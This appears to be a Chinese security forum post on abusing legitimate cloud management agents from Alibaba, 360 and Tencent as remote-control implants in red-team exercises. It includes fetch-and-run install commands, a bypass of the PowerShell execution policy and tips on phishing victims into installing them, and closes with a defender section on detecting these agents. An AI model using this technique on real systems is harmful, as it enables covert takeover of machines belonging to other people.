本帖最后由 alyssa 于 2023-9-4 23:32 编辑
hvv期间曾曝出过红队利用360企业安全云平台进行钓鱼、利用阿里云平台进行投毒等事件,出于好奇,学习了下这方面相关的知识,分享一下。 上述两个事件就不再赘述,关注过hvv的应该都知道的。笔者从三个云平台进行学习,分别为:阿里云安全中心平台、腾讯云助手、360企业安全云平台。
1阿里云-云安全中心CS云安全中心介绍概述云安全中心是一个实时识别、分析、预警安全威胁的服务器主机安全管理系统,通过防勒索、漏洞扫描修复、防病毒、防篡改、合规检查等安全能力,帮助用户实现威胁检测、响应、溯源的自动化安全运营闭环,保护云上主机、本地服务器和容器安全,并满足监管合规要求。
aliyun安全中心提供终端控制平台和agent,用于监听和控制资产内的主机 agent安装后,会实时向云安全中心服务端上报客户端信息,包括:终端是否在线、终端采集所需数据等 agent运行条件,Linux使用root账号运行、Windows使用system账号权限运行。(这个条件在攻防当中利用妥当,直接不用提权) 安装agent插件后,服务器会自动下载aegis_client和aegis_update文件,并启动进程AliYunDun和AliYunDunUpdate。其它文件和进程只有在开启相应功能后才会下载和启动。
aegis_client功能:该目录下核心进程Aliyundun,用于与云安全中心服务器建立连接;该目录下核心进程AliYunDunMonitor,用于主机安全监控与检测。 文件下载时间:安装Agent插件后,aegis_client文件会下载到服务器中。 文件所在路径: Windows 32位系统:C:\Program Files\Alibaba\aegis Windows 64位系统:C:\Program Files (x86)\Alibaba\aegis Linux系统:/usr/local/aegis
aegis_update功能:该目录下核心进程为AliYunDunUpdate,用于定期检测云安全中心Agent是否需要升级。 文件下载时间:安装Agent插件后,aegis_update文件会下载到服务器中。 文件所在路径: Windows 32位系统:C:\Program Files\Alibaba\aegis Windows 64位系统:C:\Program Files (x86)\Alibaba\aegis Linux系统:/usr/local/aegis 以上两个文件安装Agent时会自动下载,同时还有很多可选文件,需要打开相应功能才能下载,具体见:https://help.aliyun.com/zh/secur ... .0.0.45e94e842lq0r9 兼容性Window(32/64): - Windows Server 2022
- Windows Server 2019
- Windows Server 2016
- Windows Server 2012
- Windows Server 2008
Linux (64): - Alibaba Cloud Linux
- AlmaLinux
- Anolis OS
- CentOS 6、7、8
- CentOS Stream
- Debian 8及以上版本
- Gentoo
- OpenSUSE
- Red Hat 6及以上版本
- RHEL 6、7、8
- Rocky Linux
- SUSE
- Ubuntu 14.04及以上版本
同时该Agent还支持众多不同内核版本的系统,详见:https://help.aliyun.com/zh/secur ... .0.0.45e94e842lq0r9 从兼容性上看,直接降低了agent安装利用的难度。
Agent安装一键自动安装Agent 前提条件: - 服务器为阿里云服务器
- 服务器在运行,且网络无故障
- 服务器使用专有网络
- 服务器不能使用其他第三方安全软件
- 服务器所在地域支持一键安装功能
- 服务器已安装云助手
操作步骤: - 登录云安全中心控制台。在控制台左上角,选择需防护资产所在的区域:中国或全球(不含中国)。
- 在左侧导航栏,选择系统配置 > 功能设置。
- 在客户端 > 未安装客户端页签,在要安装Agent的服务器的操作列单击安装客户端,为该服务器安装Agent。
您也可以选中多台服务器后单击一键安装,批量安装Agent。 Agent插件安装完成约5分钟后,可在资产中心 > 主机资产 > 服务器页签,查看服务器的客户端在线情况。 这种方式只仅限于目标服务器是阿里云服务器,日常攻防工作当中,非云服务器目标资产还是占大多数的。这种方式不再赘述。
手动安装Agent 该方式为非云服务器上云统一管控提供了解决方案,可以将非云或其他云服务器托管到云安全中心进行统一管理。 - 登录云安全中心,区域选择全国
- 系统配置-功能设置-客户端-安装命令
3. 使用管理员权限的账号登录需要安装Agent的服务器,根据操作系统复制安装命令并执行window命令: powershell -executionpolicy bypass -c "(New-Object Net.WebClient).DownloadFile('http://aegis.alicdn.com/download/install/2.0/windows/AliAqsInstall.exe', $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath('.\AliAqsInstall.exe'))"; "./AliAqsInstall.exe -k=ogkP11"
linux命令: wget "https://aegis.alicdn.com/download/install/2.0/linux/AliAqsInstall.sh" && chmod +x AliAqsInstall.sh && ./AliAqsInstall.sh -k=wbk0j6
测试环境ubuntu20.04,执行安装命令后,出现如下信息为安装成功 安装成功后,在云安全中心-主机资产处会显示客户端 注意:安装后,服务器会启动三个进程:AliYunDunUpdate、AliYunDun和AliYunDunMonitor。其中AliYunDunMonitor进程会在其他两个进程启动后的大概10分钟左右启动。没启动前,云安全中心显示离线状态。 此时客户端主机已经上线,不过还无法进行远控,还需要安装云助手(如果服务器是云服务器,可以一键安装,安装后可进行远控)。通过云助手远控客户端。下面了解下云助手的作用和部署方式。 云助手云助手是专为云服务器ECS打造的原生自动化运维工具,免密码、免登录、无需使用跳板机,即可批量执行命令(Shell、PowerShell、Bat等),实现自动化运维脚本、轮询进程、安装卸载软件、启动或停止服务、安装补丁或安装安全更新等任务。 阿里云设计云助手主要用来操作阿里云服务器使用,但同时,也对非阿里云服务器提供了混合云方案,即使我们的目标不是阿里云服务器,也可以让它上线到云安全中心进行远控。 版本要求: - Alibaba Cloud Linux 2/3及更高版本
- CentOS 6/7/8及更高版本
- CoreOS
- Debian 8/9/10及更高版本
- OpenSUSE
- RedHat 5/6/7及更高版本
- SUSE Linux Enterprise Server 11/12/15及更高版本
- Ubuntu 12/14/16/18及更高版本
- Window Server 2012/2016/2019及更高版本
安装云助手Agent步骤一:创建托管实例注册码 云服务器ECS-运维与监控-发送命令/文件(云助手),选择托管实例 如果这里还没有实例,会显示一个创建注册码的提示,因为我已经创建了,所以会显示已经添加的实例,如果需要继续添加,可以点击“注册新实例”。 点击生成注册码后,会出现注册命令,如下图 步骤二:下载并安装agent 根据目标系统,选择可用的命令,并执行 安装完成后,系统会启动一个相关服务 步骤三:验证安装结果 回到托管实例页面,刷新 点击执行命令 点击远程控制 2360企业安全云产品介绍360企业安全云作为新一代数字安全与管理SaaS服务,基于360安全大脑安全能力,依托全面SaaS架构,实现硬件、软件、数据、资产、上网、防勒索等全方位数字安全与管理服务。从管人员、管资产、管数据三大价值层面助力企业数字化管理提效,对人员身份及行为管理、软、硬资产兼管、数据全链路守护等实现了一体化综合统效,全面赋能企业数字化转型。
详情见:https://b.360.net/product-center/Endpoint-Security/safe-team 安装部署步骤一:选择部署方式 1. 选择部署方式,创建部署连接
这里提供三种安装方式:
- 手动下载安装:该方式需管理员自己下载好客户端安装包,并在需要安装客户端的主机上运行。
- 员工自主下载:该方式需要客户端用户自行下载客户端,并安装,需管理员提供下载链接,通过沟通软件或者邮件发送给所需用户。
- 域控分发:管理员通过AD域环境将安装包分发到终端并执行。在指引中提供了分发方案。
在攻防场景中,如果去钓鱼的话,建议使用方式一和方式二(而且该平台还贴心提供了邮件信息模版),如果在内网已经有了一定的权限,可使用方式一和方式三进行远控。 步骤二:安装客户端 方式一,管理员先行下载安装包根据客户端版本下载相应的安装包方式二:需要员工自己访问下载地址进行安装
该链接是企业专属的下载链接。即按照我创建的链接下载客户端,安装后会加入到我的企业管理后台,被我远控。(hvv钓鱼那个事就是这个方式) 步骤三:进行远控 安装完成后,在远程运维-远程控制,可进行远控,如下图 局限性 进行远控分为多个方式,如下图 对于攻防场景来说,远控和执行命令是最为需要的,但是目前360企业安全云,只有PC远程控制可以免费,而且需要被控端同意,才可以远程控制,如下图 这直接增加了被发现的风险。 在该问题上,360企业安全云同样有解决方案:无人值守远程控制,这个不需要确认直接可以远程控制。但是却需要花费一定的大米,看一下花费多少大米 另外一种方式:远程CMD,花费大米如下 因为笔者吃不起苕皮,不舍得花费这80米,所以就没办法复现远控的镜头啦(狗头)。对笔者来说确实是局限性。 3腾讯云助手CS产品简介概述自动化助手(TencentCloud Automation Tools,TAT)是云服务器 CVM 和轻量应用服务器 Lighthouse 的原生运维部署工具。自动化助手提供了一种自动化的远程操作方式,无需登录及密码,即可批量执行命令(Shell、PowerShell 及 Python 等),完成运行自动化运维脚本、轮询进程、安装/卸载软件、更新应用及安装补丁等任务。
自动化助手虽然是腾讯云服务运维部署工具,但是也提供了非腾讯云的方案,将非腾讯云机器通过自动化助手注册为腾讯云托管实例。 兼容性服务器操作系统版本需为: - TencentOS Server 2/3及更高版本。
- OpenCloudOS Server 8/9及更高版本。
- CentOS 6/7/8、CentOS Stream 8/9及更高版本。
- Ubuntu 14/16/18/20/22及更高版本。
- Debian 8/9/10/11及更高版本。
- RedHat 7/8/9及更高版本。
- 其他 Linux 操作系统版本:CoreOS、Fedora、OpenSUSE、Fedora、FreeBSD、Rocky Linux 等。
- Windows Server 2008/2012/2016/2019/2022 及更高版本。
- 待注册的服务器支持公网访问(直连方式与代理方式均可)。
基本覆盖了常用的服务器版本。 部署步骤一:生成注册码 2. 填写相关信息,并生成注册码参数说明:[td]
| | | 参数名称 | 参数描述 | | 注册码名称 | 新注册的实例,将使用对应注册码的名称作为前缀生成有序的实例名。 | | 有效网段 | 指定注册码限制客户端只能从有效网段出口进行注册。默认不做限制。 | | 可注册实例数 | 指定注册码允许注册的实例数,可设置范围1~999台,默认限制为10台。 | | 有效时间 | 指定注册码的有效时间,可设置范围1~11小时,默认为4小时。 | | 注册码描述 | 描述当前注册码的用途等信息,方便后续管理。 |
步骤二:托管实例
Agent自动生成服务tat_agent.service,并开始执行。 2. 回到腾讯云,查看托管实例列表 3. 执行命令 4免杀效果通过上述操作不难发现,我们如果想要让目标服务器上线,避免不了安装agent等客户端,那么在安装客户端的时候,会被现有的安全防病毒查杀吗? 云安全中心Agent 云助手agent 360 agent 5防守方视角作为防守方,如果我们的服务器被上述方式控制,我们应该要做哪些工作?如何去防守呢? 首先,可以从进程和服务进行排查。 阿里云安全中心,安装了Agent时,服务器会启动三个进程和一个服务,分别是:AliYunDun、AliYunDunUpdate、AliYunDunMonitor和服务aliyun-service
腾讯云助手,安装自动化助手agent时,系统自动创建tat_agent.service服务,使用systemctl list-units --type=service --state=running 列出所有正在运行的服务 systemctl status tat_agent.service 查看服务状态
同时也可查看进程
其次,阿里云安全中心agent可以从系统添加的用户排查。当安装了云助手时,系统默认添加用户ecs-assist-user,通过查看/etc/passwd进行排查 6待解决问题
| 
发表于 2023-9-4 23:31:42